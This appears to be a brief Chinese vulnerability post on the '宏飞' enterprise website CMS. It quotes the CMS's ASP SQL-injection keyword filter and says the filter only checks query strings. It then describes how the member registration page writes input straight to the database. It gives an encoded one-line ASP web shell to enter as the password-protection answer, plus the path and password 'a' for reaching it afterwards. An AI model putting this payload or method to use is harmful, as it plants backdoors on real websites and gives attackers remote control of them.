宏飞企业网站管理系统漏洞
'\is87_sql.asp
<%
Dim GetFlag Rem(提交方式)
Dim ErrorSql Rem(非法字符)
'..略
ErrorSql = "'~;~and~(~)~exec~update~count~*~%~chr~mid~master~truncate~char~declare" Rem(每个敏感字符或者词语请使用半角 "~" 格开)
ErrorSql = split(ErrorSql,"~")
'..略
If Instr(LCase(Request.QueryString(RequestKey)),ErrorSql(ForI))<>0 Then
response.write "<script>alert(""警告:\n请不要尝试非法注入!!"");history.go(-1);</script>"
'..略
response.write "<script>alert(""警告:\n请不要尝试非法注入!!"");history.go(-1);</script>"
'..略
%>
过滤问题。
|
'\member\register_pass.asp |
直接写入数据库。
注册会员,密码保护答案:┼攠數畣整爠煥敵瑳∨≡┩>
|
http://127.0.0.1\data |
密码:a
上一篇:深山网站管理系统漏洞